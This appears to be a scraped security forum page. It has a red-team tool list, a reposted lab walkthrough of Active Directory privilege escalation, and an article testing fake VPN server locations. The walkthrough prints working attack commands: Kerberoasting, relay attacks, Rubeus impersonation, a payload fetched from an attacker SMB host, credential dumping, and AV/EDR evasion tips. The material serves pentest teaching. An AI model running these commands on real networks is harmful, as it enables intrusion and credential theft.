https://github.com/ebursztein/malusb Fenrir is a tool designed to be used "out-of-the-box" for penetration tests and offensive engagements. Its main feature and purpose is to bypass wired 802.1x protection and to give you an access to the target network. https://github.com/Orange-Cyberdefense/fenrir-ocd poisontap exploits locked/password protected computers over USB, drops persistent WebSocket-based backdoor, exposes internal router, and siphons cookies using Raspberry Pi Zero & Node.js. https://github.com/samyk/poisontap WHID WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids. https://github.com/whid-injector/WHID Software For Team Communication RocketChat is free, unlimited and open source. Replace email & Slack with the ultimate team chat software solution. https://rocket.chat Etherpad is an open source, web-based collaborative real-time editor, allowing authors to simultaneously edit a text document https://etherpad.net Log Aggregation RedELK Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations. https://github.com/outflanknl/RedELK/ CobaltSplunk Splunk Dashboard for CobaltStrike logs. https://github.com/vysec/CobaltSplunk Red Team Telemetry A collection of scripts and configurations to enable centralized logging of red team infrastructure. https://github.com/ztgrace/red_team_telemetry Elastic for Red Teaming Repository of resources for configuring a Red Team SIEM using Elastic. https://github.com/SecurityRiskAdvisors/RedTeamSIEM C# Offensive Framework SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers. https://github.com/cobbr/SharpSploit GhostPack is (currently) a collection various C# implementations of previous PowerShell functionality, and includes six separate toolsets being released today- Seatbelt, SharpUp, SharpRoast, SharpDump, SafetyKatz, and SharpWMI. https://github.com/GhostPack SharpWeb .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. https://github.com/djhohnstein/SharpWeb reconerator C# Targeted Attack Reconnissance Tools. https://github.com/stufus/reconerator SharpView C# implementation of harmj0y's PowerView. https://github.com/tevora-threat/SharpView Watson is a (.NET 2.0 compliant) C# implementation of Sherlock. https://github.com/rasta-mouse/Watson Labs Detection Lab This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. https://github.com/clong/DetectionLab Modern Windows Attacks and Defense Lab This is the lab configuration for the Modern Windows Attacks and Defense class that Sean Metcalf (@pyrotek3) and I teach. https://github.com/jaredhaight/WindowsAttackAndDefenseLab Invoke-UserSimulator Simulates common user behaviour on local and remote Windows hosts. https://github.com/ubeeri/Invoke-UserSimulator Invoke-ADLabDeployer Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams. https://github.com/outflanknl/Invoke-ADLabDeployer Sheepl Creating realistic user behaviour for supporting tradecraft development within lab environments. https://github.com/SpiderLabs/sheepl Scripts Aggressor Scripts is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots. https://github.com/invokethreatguy/CSASC https://github.com/secgroundzero/CS-Aggressor-Scripts https://github.com/Und3rf10w/Aggressor-scripts https://github.com/harleyQu1nn/AggressorScripts https://github.com/rasta-mouse/Aggressor-Script https://github.com/RhinoSecurityLabs/Aggressor-Scripts https://github.com/bluscreenofjeff/AggressorScripts https://github.com/001SPARTaN/aggressor_scripts https://github.com/360-A-Team/CobaltStrike-Toolset A collection scripts useful for red teaming and pentesting https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/nettitude/Powershell https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts https://github.com/threatexpress/red-team-scripts https://github.com/SadProcessor/SomeStuff https://github.com/rvrsh3ll/Misc-Powershell-Scripts https://github.com/enigma0x3/Misc-PowerShell-Stuff https://github.com/ChrisTruncer/PenTestScripts https://github.com/bluscreenofjeff/Scripts https://github.com/xorrior/RandomPS-Scripts https://github.com/xorrior/Random-CSharpTools https://github.com/leechristensen/Random https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/social-engineering References MITRE’s ATT&CK™ is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. https://attack.mitre.org/wiki/Main_Page Cheat Sheets for various projects (Beacon/Cobalt Strike,PowerView, PowerUp, Empire, and PowerSploit). https://github.com/HarmJ0y/CheatSheets PRE-ATT&CK Adversarial Tactics, Techniques & Common Knowledge for Left-of-Exploit. https://attack.mitre.org/pre-attack/index.php/Main_Page Adversary OPSEC consists of the use of various technologies or 3rd party services to obfuscate, hide, or blend in with accepted network traffic or system behavior. https://attack.mitre.org/pre-attack/index.php/Adversary_OPSEC Adversary Emulation Plans To showcase the practical use of ATT&CK for offensive operators and defenders, MITRE created Adversary Emulation Plans. https://attack.mitre.org/wiki/Adversary_Emulation_Plans Red-Team-Infrastructure-Wiki Wiki to collect Red Team infrastructure hardening resources. https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki Advanced Threat Tactics – Course and Notes This is a course on red team operations and adversary simulations. https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes Red Team Tips as posted by @vysecurity on Twitter. https://vincentyiu.co.uk/red-team-tips Awesome Red Teaming List of Awesome Red Team / Red Teaming Resources. https://github.com/yeyintminthuhtut/Awesome-Red-Teaming ATT&CK for Enterprise Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK. https://attack.mitre.org/wiki/Software Planning a Red Team exercise This document helps inform red team planning by contrasting against the very specific red team style described in Red Teams. https://github.com/magoo/redteam-plan Awesome Lockpicking a curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys. https://github.com/meitar/awesome-lockpicking Awesome Threat Intelligence a curated list of awesome Threat Intelligence resources. https://github.com/hslatman/awesome-threat-intelligence APT Notes Need some scenario? APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. https://github.com/aptnotes/data TIBER-EU FRAMEWORK The European Framework for Threat Intelligence-based Ethical Red Teaming (TIBER-EU), which is the first Europe-wide framework for controlled and bespoke tests against cyber attacks in the financial market. http://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf CBEST Implementation Guide CBEST is a framework to deliver controlled, bespoke, intelligence-led cyber security tests. The tests replicate behaviours of threat actors, assessed by the UK Government and commercial intelligence providers as posing a genuine threat to systemically important financial institutions. https://www.crest-approved.org/wp-content/uploads/2014/07/CBEST-Implementation-Guide.pdf Red Team: Adversarial Attack Simulation Exercise Guidelines for the Financial Industry in Singapore The Association of Banks in Singapore (ABS), with support from the Monetary Authority of Singapore (MAS), has developed a set of cybersecurity assessment guidelines today to strengthen the cyber resilience of the financial sector in Singapore. Known as the Adversarial Attack Simulation Exercises (AASE) Guidelines or “Red Teaming” Guidelines, the Guidelines provide financial institutions (FIs) with best practices and guidance on planning and conducting Red Teaming exercises to enhance their security testing. https://abs.org.sg/docs/library/abs-red-team-adversarial-attack-simulation-exercises-guidelines-v1-06766a69f299c69658b7dff00006ed795.pdf License Sursa: https://github.com/shr3ddersec/Shr3dKit
  28. 2 points
    Penetration Testing Active Directory, Part II Hausec Infosec March 12, 2019 13 Minutes In the previous article, I obtained credentials to the domain three different ways. For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation. Privilege escalation in Windows can of course come from a missing patch or unquoted service paths, but since this is pentesting AD, we’re going to exploit some AD things in order to elevate privileges. With credentials to the network we now should do a little recon before we directly look to missing patch exploits. There’s a few tools and techniques that will help. Phase II: Privilege Escalation & Reconnaissance “Time spent on reconnaissance is seldom wasted.” – Arthur Wellesley Tool: Bloodhound One of my favorite tools is Bloodhound. Attackers think in graphs, so Bloodhound is an excellent tool because it literally maps out the domain in a graph, revealing relationships that are both intended and not intended. From an attacker perspective, this is interesting because it shows us targets. I wrote a whole thing on Bloodhound, which can be read here, but I’ll show a tl;dr version. Let’s assume you don’t have a session opened on a machine, but you have credentials. You can still use Bloodhound’s Python ingestor and remotely gather the data. It can in be installed via git git clone https://github.com/fox-it/BloodHound.py.git cd BloodHound.py/ && pip install . Then can be ran by passing in the credentials, domain, and DC IP bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all Once BH does it’s thing, it will store the data in the directory you ran it in, in .json format. Copy those files, then drag them into Bloodhound and you now have a pretty graph of the network. If you sort by “Shortest path to domain admin” you’ll get something similar to below AdminAlice is logged into a DC. The power of this is that you can directly see what administrators are logged into what machines, giving you a next target. In a domain of hundreds or maybe even thousands of machines that will accept low-privilege credentials, you don’t want to waste time by just gathering other low-priv creds. This gives a target list, among many other things. Other uses can include identifying SQL servers that might have databases containing credentials, identifying what machines can be RDP’d into, and so much more. I encourage you to read more about it’s capabilities in depth here. I also encourage you to look at GoFetch, which automatically utilizes an attack plan drawn out by Bloodhound. Attack: Kerberoasting | Tool: GetUserSPNs.py With a target list and a domain controller identified, one way of privilege escalation is Kerberoasting. Kerberoasting is possible because service accounts are issued a Service Principal Name (SPN) within AD. It is possible then for any user to request a Kerberos ticket from the SPN, which has that accounts hashed password (In Kerberos 5 TGS-REP format). There are many different tools that can do Kerberoasting, but really you only need one tool. GetUserSPNs.py is pretty self explanatory — it queries the target domain for SPNs that are running under a user account. Using it is pretty simple. And now we have the hash to a service account. I load it into hashcat (GUI, of course) and select hash type 13100, as highlighted below And it cracks within a few seconds We now have the credentials to a service account, which usually results in access to the domain controller. Too easy? Let’s try other ways. Attack: ASEPRoasting | Tool: Rubeus ASEPRoasting is similar to Kerberoasting in the sense that we query accounts for TGTs, get the hash, then crack it, however in the case of ASEPRoasting there’s a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting. When you request a TGT, via a Kerberos AS-REQ message, you also supply a timestamp that is encrypted with your username and password. The Key Distribution center (KDC) then decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker because we aren’t the KDC and cannot decrypt that message. Of course, this is by design, to prevent attacks, however if pre-authentication is turned off, we can send an AS-REQ to any user which will return their hashed password in return. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, however still worth mentioning. tsmith is susceptible to ASREPRoasting because ‘Do not require Kerberos preauthentication’ is checked. To exploit this, we’ll use a tool called Rubeus. Rubeus is a massive toolset for abusing Kerberos, but for conducting ASREPRoasting, we care about this section. To use Rubeus, you first need to install Visual Studio. Once installed, download Rubeus and open the Rubeus.sln file with Visual studio. By default, it will install in the Rubeus\bin\Debug\ file. cd into that directory, then run it: .\Rubeus.exe asreproast If no users have ‘Do not require Kerberos preauthentication’ checked, then there won’t be any users to roast. But if there is… We then can get the hash for the user and crack it. Keep in mind that the examples were done on a computer already joined to the domain, so if you were doing this from a computer not on the domain, you would have to pass in the domain controller, domain name, OUs, etc. Tool: SILENTTRINITY SILENTTRINITY is a new Command and Control (C2) tool developed by @byt3bl33d3r which utilizes IronPython and C#. You have the option to use MSBuild.exe, a Windows binary which builds C# code (which is also installed by default with Windows 10, as part of .NET) to run a command & control (C2) payload in an XML format, allowing the attacker to then use the underlying .NET framework to do as they please on the victim’s machine via IronPython, C#, and other languages. Personally, SILENTTRINITY has replaced Empire in my toolkit and I wrote a guide on how to use it here. There’s still select areas where I’d prefer to have an Empire connection, but ST is also in an ‘alpha’ state, so that functionality will come. There’s three main reasons why ST has replaced Empire, in my opinion. Empire payloads are now being caught by Windows Defender, even when obfuscated (there’s ways around it, but still.) ST lives off the land You can elevate to SYSTEM privileges when executing the payload over CME with the –at-exec switch. Below is a PoC in a fresh Windows 10 install, using a non-Domain Admin user’s credentials Account “tsmith” is only in the user’s group Code execution with tsmith’s credentials I generate the XML payload in SILENTTRINITY, then host it on my SMB server via smbserver.py. If you’re confused on how to do that, follow my guide here. I then use CME to execute the command that will fetch the XML file on my attacker machine. crackmapexec 192.168.218.60 -u tsmith -p Password! -d lab.local -x 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.218.129\SMB\msbuild.xml' --exec-method atexec CME executes the supplied command, which runs msbuild.exe and tells it to build the XML file hosted on my SMB server I now have a session opened in ST And listing the info for the session reveals my username is SYSTEM, meaning I escalated from user tsmith to SYSTEM, due to the fact that MSBuild.exe ran with the –exec-method atexec option, which uses Task Scheduler with SYSTEM privileges (or whatever the highest possible it) to run the command. And of course, we then dump credentials and now have an administrator password hash which we can pass or crack. Attack: PrivExchange PrivExchange is a new technique (within the past month) that takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirkjann a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server’s credentials, then relaying the credentials in the response to the Domain Controller via ntlmrelayx, then modifying a user’s privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user. ntlmrelayx.py -t ldap://192.168.218.10 --escalate-user rsmith Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain. python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201 Privexchange.py makes the API call to the echange ntlmrelayx relays the Exchange server’s credentials to the Master DC, then escalates rsmith’s privileges Using rsmith’s privileges to dump the hashes on the DC. With the hashes to all users, they can now be cracked. Side note: If you ever run Mimikatz and it gets caught by AV, secretsdump.py is an excellent alternative, as it doesn’t drop anything to disk. Attack: Kerberos Unconstrained Delegation Also from Dirk-jan, is an attack that takes advantage of default AD installs. Specifically, the fact that computers can, by default, change some attributes relating to their permissions such as msDS-AllowedToActOnBehalfOfOtherIdentity. This attribute controls whether users can login to (almost) any computer on the domain via Kerberos impersonation. This is all possible through relaying credentials. I’ve demonstrated mitm6 in part one, so I’ll use it again here, but relay the responses in a different way. mitm6 -i ens33 -d lab.local I then serve the WPAD file and relay the credentials over LDAPS to the primary DC while choosing the delegate access attack method. ntlmrelayx.py -t ldaps://LAB2012DC01.lab.local -wh 192.168.10.100 --delegate-access The victim opens IE, which sends out a WPAD request over IPv6, which the attacker (me) responds to and relays those credentials to the DC over LDAPS. A new computer is created and the delegation rights are modified so that the new ‘computer’ can impersonate any user on LABWIN10 (the victim) via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. So I now generate a silver ticket and impersonate the user ‘Administrator’. getST.py -spn cifs/LABWIN10.lab.local lab.local/AFWMZ0DS\$ -dc-ip 192.168.10.10 -impersonate Administrator I then logon to LABWIN10 with my silver ticket via secretsdump.py and dump the credentials. To read more on silver ticket attacks and how they work, this is a good article. Attack: Resource-based Constrained Delegation Yes, more attacks due to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. @harmj0y made a post a few weeks ago on this. Essentially, if you’re able to change a computer object in AD, you can take over the computer itself. The only catch to this is there needs to be one 2012+ domain controller, as older versions do not support resource-based constrained delegation (RBCD). Elad Shamir breaks the entire attack down, including more about RBCD, in this article. There’s three tools used for this: Powermad Powerview Rubeus This attack is then conducted on the Windows 10 machine with rsmith’s credentials. First, we set the executionpolicy to bypass so we can import and run scripts. Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser Then we check to see if we can modify discretionary access control lists (DACLs). $AttackerSID = Get-DomainGroup Users -Properties objectsid | Select -Expand objectsid Get-DomainObjectACL LAB2012DC01.lab.local | ?{$_.SecurityIdentifier -match $AttackerSID} The above commands look up rights for the ‘Users’ SID, showing that the group has ‘Generate Write’ permissions on the object (the DC). By default, this isn’t exploitable. This is abusing a potential misconfiguration an Administrator made; in this example it is the fact that the Admin added the “Users” group as a principal to the DC and allowed the GenericWrite attribute. As a PoC, rsmith (who is in the “Users” group), cannot get into the DC. What we do next is create a new computer account and modify the property on the domain controller to allow the new computer account to pretend to be anyone to the domain controller, all thanks to the msDS-allowedToActOnBehalfOfOtherIdentity. It’s possible for us to create a new computer account, because by default a user is allowed to create up to 10 machine accounts. Powermad has a function for it New-MachineAccount -MachineAccount hackermachine -Password $(ConvertTo-SecureString 'Spring2017' -AsPlainText -Force) We then add the new machine’s SID to the msDS-allowedToActOnBehalfOfOtherIdentity attribute on the DC. $ComputerSid = Get-DomainComputer hackermachine -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} Then use Rubeus to get the NT password for our created machine. .\Rubeus.exe hash /password:Spring2017 /user:hackermachine /domain:lab.local Finally, we then impersonate a domain administrator (Administrator) using Rubeus’ service for user (S4U) process on the target DC. .\Rubeus.exe s4u /user:hackermachine$ /rc4:9EFAFD86A2791ED001085B4F878AF381 /impersonateuser:Administrator /msdsspn:cifs/LAB2012DC01.lab.local /ptt With the ticket imported, we can then access the domain controller. Again, this is leveraging the fact that the system administrator dun goofed and added the ‘Users’ group to have Generic_Write access to the DC. Even though we couldn’t access it via SMB, we modified the permissions that would allow us to. If you’re still confused, here’s a video from SpecterOps demonstrating a walkthrough. Attack: MS14-025, GPP This one is less common as it’s been out for quite some time, however it gets a mention because it still does exist. MS14-025 is also known as the group policy preferences escalation vulnerability. When a Domain Administrator would push out a local administrator account via Group Policy Preferences, it would store the encrypted credentials in the SYSVOL share on the domain controller (SYSVOL is accessible by anyone, as it’s where policies are stored and other things domain clients need to access). This typically wouldn’t be a problem because it’s encrypted with AES encryption, right? Well, Microsoft dun goofed and published the decryption key. So now, attackers can decode the password. To simplify things, Metasploit has an auxiliary module for this. Attack: Finding over privileged accounts | Tool: CrackMapExec Ok, this one isn’t necessarily an “attack” as much as it is a methodology of doing good reconnaissance and enumeration, which a few tools can help out with. This seems like kinda of a stretch from an article standpoint, but in reality over privileged accounts are so incredibly common, that it’s not unusual to find one persons accounts then log into another persons workstation and have read access to their stuff. In addition, having privileges to servers where that user should have no business accessing, which of course leads to the attacker just dumping credentials everywhere and eventually finding creds that work on the domain controller. The methodology here is pretty easy: Spray the credentials across the network, see what you can log into. With crackmapexec, you can list the shares and see what you have write access to. crackmapexec 192.168.218.0/24 -u rsmith -p Winter2017 --shares From here, use SILENTTRINITY to get a session open on what the user has write access to, run the mimikatz module, and hope you find new credentials that are privileged. Remember, you can use CME with CIDRs, meaning if you’re using SILENTTRINITY as your C2 server and using CME to trigger the connection, you can spray that across the network for maximum sessions. Although it’s not very OpSec friendly and quite noisy. Consider it a test to see how their detection and response posture is Tools: PowerTools Suite Attack 1: Finding passwords in files. Another thing to look for is passwords in files. There’s been several occasions where I find a user is storing emails in their Documents folder, which contains a password. Or they keep an Excel/Word file with passwords in it. This is where the PowerSploit suite comes in handy. Where do I begin with the PowerSploit suite…basically if you want to do something malicious, there’s a Powershell module for it. In the case of searching for passwords, or any string for that matter, PowerView is your friend. Keep in mind EDRs catch basically every module in this suite, so I suggest encoding them before using via Invoke-Obfuscation. PowerView is easy to use. Download the PowerSploit suite, and open Powershell in the directory you’ve extracted it in (make sure you’re admin). First, allow scripts to be ran. Set-ExecutionPolicy Bypass Then import the module Import-Module .\PowerView.ps1 In the PowerView module is a command called Invoke-FileFinder, which allows you to search for files or in files for any string you want. Consider the string ‘password’. Search the C drive for anything containing the string ‘password’ Found a secret password file! Just be mindful that this takes a very long time. It helps to narrow the search area down and running the command from that directory. Attack 2: Get-ExploitableSystem This is a pretty self-explanatory script. It will query Active Directory for the hostname, OS version, and service pack level for each computer account, then cross-referenced against a list of common Metasploit exploits. First import the whole PowerSploit suite (Or just PowerView if you want) Import-Module .\PowerSploit.psd1 Then run the command Get-ExploitableSystem -Verbose Hurray for Windows XP! Attack 3: PowerUp In the PowerUp module is a function called “Invoke-All-Checks” which does exactly what it says it does. It checks for everything, from unquoted service paths (which I wrote on how to exploit here) to looking for MS14-025, it does a lot. Look at the Github for more info. Using it is simple Invoke-AllChecks Thanks MSI. Attack 4: GetSystem This module does the same thing the Metasploit ‘GetSystem’ function does. To find out more about what exactly that entails, read this excellent post by CobaltStrike. Otherwise, just run the command. Get-System -Technique Token or Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' I am just a lonely Admin. I am SYSTEM! Tool(s): ADAPE Personally, I wrote one called ADAPE – The Active Directory Assessment and Privilege Escalation script ADAPE is written in Powershell and uses several different other tool’s functions and runs them automatically, preventing the need to port over multiple tools. It’s also obfuscated and turns off Windows Defender to help bypass EDR. ADAPE is meant to be easy to use. Download it, port it over to your target Windows Machine, and run it PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 Since all the necessary scripts are included, it doesn’t need to reach out to the internet and will store the results in a capture.zip file that can be exported. Error messages are normal, unless it breaks. Then report. Looking for GPP passwords, Kerberoasting, and running Bloodhound ingestor Checking for privesc, then deleting the files it made and zipping up the capture file. If you open up the capture file, you’ll have all the results. Again, by all means, this is not comprehensive. This is just a few tools and attacks I’ve used successfully over the years, so there’s a good chance at least one of these works. In part III, I will go over post-exploitation and persistence. Resources and References: I take no credit for the discovery of any of these techniques, I’m just the dude that makes an article about the ones I like to use. Massive thank you to @harmj0y, @cptjesus, @_wald0, and the rest of the team at SpecterOps for the amazing research they do as well as creation of several excellent tools. Thank you to the Bloodhound Slack for answering my question. Thank you @byt3bl33d3r and the team at Black Hills InfoSec for the research and tools they make. Thank you @_dirkjan and the team at Fox-it for the research and tools. Thank you secureauth for impacket, a staple in every pentesters tool kit. Sursa: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
  29. 2 points
    Cu asta " Am crezut ca ii o platforma de profesionisti(nu neg ca nu exista printre voi profesionisti , si cred ca unii ft ft buni) ! ms oricum ," ti-ai cam taiat craca
  30. 2 points
    Do VPNs really have all the servers they claim in exotic locations all over the world? In many cases, the answer is no. The true location of some VPN servers may be entirely different. In other words, a server that is allegedly in Pakistan is actually in Singapore. Or a server that should be in Saudi Arabia is actually in Los Angeles, California. (Both are real examples from below.) This is known as spoofing the true location. Why is this important? First, the performance may suffer if the actual server is significantly further away. Second, it’s bad if you are trying to avoid certain countries (such as the UK or US) where the server may be located. Third, customers aren’t getting the true server locations they paid for. And finally, using fake server locations raises questions about the VPN’s honesty. In this article we’ll take a deep dive into the topic of fake VPN server locations. The point here is not to attack any one VPN provider, but instead to provide honest information and real examples in order to clarify a confusing topic. We will cover four main points: VPN server marketing claims Fake server locations with ExpressVPN (11 are identified) Fake server locations with PureVPN (5 are identified, but there are many more) How to test and find the true location of VPN servers But before we begin, you might be asking yourself, why do VPNs even use fake server locations? The incentives are mainly financial. First, it saves lots of money. Using one server to fake numerous server locations will significantly reduce costs. (Dedicated premium servers are quite expensive.) Second, advertising numerous server locations in a variety of countries may appeal to more people, which will sell more VPN subscriptions. Here’s how that works… My, what a larger server network you have! Most of the larger VPN providers boast of server networks spanning the entire world. This seems to be the trend – they are emphasizing quantity over quality. Take Hidemyass for example and their server network claims: If you think there are physical servers in 190+ countries, I have a bridge to sell you! Upon closer examination of Hidemyass’s network, you find some very strange locations, such as North Korea, Zimbabwe, and even Somalia. But reading further, it becomes clear that many of these locations are indeed fictitious. Hidemyass refers to these fictitious server locations as “virtual locations” on their website. Unfortunately, I could not find a public server page listing all server URLs, so I could not test any of the locations. However, the Hidemyass chat representative I spoke with confirmed they use “virtual” locations, but could not tell me which locations were fake and which were real. PureVPN is another provider that admits to using fake locations, which they refer to as “virtual servers” – similar to Hidemyass. (We will take a closer look at PureVPN below, with testing results for the servers that are not classified as virtual.) ExpressVPN also boasts of a large server network. Unlike with PureVPN and Hidemyass, ExpressVPN does not admit to using fake locations anywhere on its website. The ExpressVPN chat representative I spoke with claimed that all server locations were real. (This was proven through testing to be false.) Testing shows that many of ExpressVPN’s server locations are fake. Just like with Hidemyass and PureVPN, testing results show that ExpressVPN is using fictitious server locations, which we will cover in detail below. Testing VPN server locations With free network-testing tools, you can quickly find the true location of a VPN server. This allows you to cross-check dubious server locations with a high degree of accuracy. For every VPN server examined in this article, I used three different network-testing tools to verify the true location beyond any reasonable doubt: CA App Synthetic Monitor ping test (ping test from 90 different worldwide locations) CA App Synthetic Monitor traceroute (tests from various worldwide locations) Ping.pe (ping test from 24 different worldwide locations) First, I used this ping test, which pings the VPN server from 90 different worldwide locations. This allows you to narrow down the location with basic triangulation. In general, the lower the time (ms), the closer the server is to a given location. Pretty simple and accurate. Second, I ran traceroutes from various locations based on the results in the first test. This allows you to measure the distance along the network to the final VPN server. With ExpressVPN, for example, I could run a traceroute from Singapore and find that the VPN server is about 2 ms away, which means it is also located in Singapore. Third, I used another ping test to again ping the VPN server from different worldwide locations. This tool also includes traceroutes for each location (MTR). Note: When running traceroutes or ping tests, you may have some outlier test results due to different variables with the network and hops. That’s why I recommend running multiple tests with all three of the tools above. This way, you will be able to eliminate outlier results and further confirm the true server location. With every fictitious server location found in this article, all three tools strongly suggested the exact same location. If there was any doubt, I did not label the server as “fake” below. ExpressVPN server locations As we saw above, ExpressVPN boasts a large number of servers on their website in some very interesting locations. In the map below you can see many of their southeast Asia server locations in red boxes. These are all the locations that were determined to be fictitious after extensive testing, with the actual server being located in Singapore. Every ExpressVPN server location in a red box was found to be fake after extensive testing. ExpressVPN does not make any of their server URLs publicly available. So to obtain the server URL, you need to have an ExpressVPN account, then go into the member area and download the manual configuration files. In total, I found 11 fake VPN server locations with ExpressVPN. Below I will show you the test results for one location (Pakistan). You can find the the other test results in the Appendix to this article. ExpressVPN’s Pakistan server (Singapore) URL: pakistan-ca-version-2.expressnetw.com Test 1: Ping times from different worldwide locations reveals the server is much closer to Singapore than to Bangalore, India. If the server was truly in Pakistan, this would not make much sense. … At only 2 milliseconds ping (distance), this “Pakistan” server is without a doubt in Singapore. But to further prove the location, we can run a few more tests. Test 2: Running a traceroute from Singapore to the “Pakistan” VPN server, we can once again verify that this server is in Singapore, at about 2 ms ping. Looking at every hop in the traceroute gives you the full picture of the network path. This shows how much distance (time) is between the final VPN server and the traceroute location. At around 2 ms, this server is clearly in Singapore. Just for fun, we will run one more test, even though it is already clear where the server is located. Test 3: Here is another ping test using the website ping.pe. The Pakistan server location is undoubtedly fictitious (spoofed). The real location is in Singapore. One other sign you see with ExpressVPN’s fake server locations is the second-to-last server IP address (before the final hop) when you run the traceroute is the same. With all the fake server locations in Asia you find this IP address before the final hop: 174.133.118.131 With a traceroute you can see that the final (spoofed) server is always very close to the IP address above. This is simply more evidence pointing to the obvious conclusion that Singapore is the true location of all these servers. In addition to Pakistan, here are the other fictitious server locations found with ExpressVPN: Nepal Bangladesh Bhutan Myanmar Macau Laos Sri Lanka Indonesia Brunei Philippines Note: there may be more fake locations, but I did not have time to test every server. Update: Six days after publishing this article ExpressVPN has admitted to numerous fake locations on its website (mirror) – 29 fictitious locations in total. Just like PureVPN and Hidemyass, ExpressVPN refers to these as “virtual” server locations. PureVPN server locations PureVPN has quite a few fake server locations. On the PureVPN server page you find that many of the servers begin with “vl” which seems to stand for “virtual location”. You find two different types of these prefixes: vleu (which probably stands for virtual location Europe) and vlus (which likely means virtual location US). Every “vl” location I tested was indeed fake (or “virtual” as they like to call it). But I also found that many of their non-virtual locations are also fake, such as Aruba and Azerbaijan in the screenshot above. Here is one example: PureVPN’s Azerbaijan server (United Kingdom) URL: az1-ovpn-udp.pointtoserver.com The ping test clearly shows this server location to be in the United Kingdom – in close proximity to Edinburgh. Furthermore, the ping times for Turkey (which is close to Azerbaijan) are much higher than the UK. The server location is already clear; it is located in the UK. But to further verify the location beyond doubt, I ran a traceroute from Edinburgh, UK to the “Azerbaijan” server: At around 2 milliseconds, this server is without a doubt in the United Kingdom, not Azerbaijan. In addition to Azerbaijan, I also found four other fake “non-vl” server locations with PureVPN: Aruba Saudi Arabia Bahrain Yemen Note: I did not spend much time testing PureVPN server locations because it was clear that many locations were fake. Consequently, I only chose five examples for this article. How to find the real VPN server location Determining the real location of a VPN server is quick and easy with the five steps below. Step 1: Obtain the VPN server URL or IP address You should be able to find the URL or IP address of the VPN server in the members area. You may need to download the VPN configuration file for the specific location, and then just open the file and get the URL for the server. Some VPNs openly provide this information on their server page. Here I downloaded the OpenVPN configuration file for the ExpressVPN Nepal server. After opening the file, I find the server URL near the top. Now copy the URL of the VPN server for step 2. Step 2: Ping the VPN server from different worldwide locations Use this free tool from CA App Synthetic Monitor to ping the VPN server from about 90 different worldwide locations. Enter the VPN server URL (or IP address) from step 1 into the box and hit Start. It will take a few seconds for the ping results to show. Step 3: Examine results to determine actual location Now you can examine the results, looking for the lowest ping times to determine the closest server. You may want to have a map open to examine which server should have the lowest ping based on geographical distance. From all of the testing locations, Bangalore, India should have the lowest ping due to its close proximity to Nepal. But if you look at all the results, you may find that the exact location of the server is somewhere else. Looks like we have a winner. This VPN server is located in Singapore – NOT Nepal. At this point it is clear that the server location is in Singapore, and not Nepal (for this example). But just to verify these results, we will run some more tests. Step 4: Run a few traceroute tests You can further probe the exact location by running a traceroute test. This is simply a way to measure the time it takes for a packet of data to arrive at the server location, across the different hops in the network. There are different options for traceroute testing, such as the Looking Glass from Hurricane Electric. My preferred method is to use this traceroute tool from CA App Synthetic Monitor and then select the location to run the traceroute from. First, you can run the traceroute from a location that should be the closest to the server location. In this case, that would be New Delhi, which is the closest location I can find to Nepal. Just enter the VPN server URL and select your test location for the traceroute. Now we will run another traceroute, but this time from Singapore. We have a winner: Singapore. It is now clear that this ExpressVPN Nepal server is located in Singapore. But you can also cross check with one more test. Step 5: Run another ping test Just like in step 2, Ping.pe will ping the VPN server from different worldwide locations, allowing you to narrow down the likely location. This tool will continuously ping the server and calculate the average time for every location. Furthermore, it will run traceroutes for every location, allowing you to further verify the location. As before, simply enter the VPN server URL and hit Go. 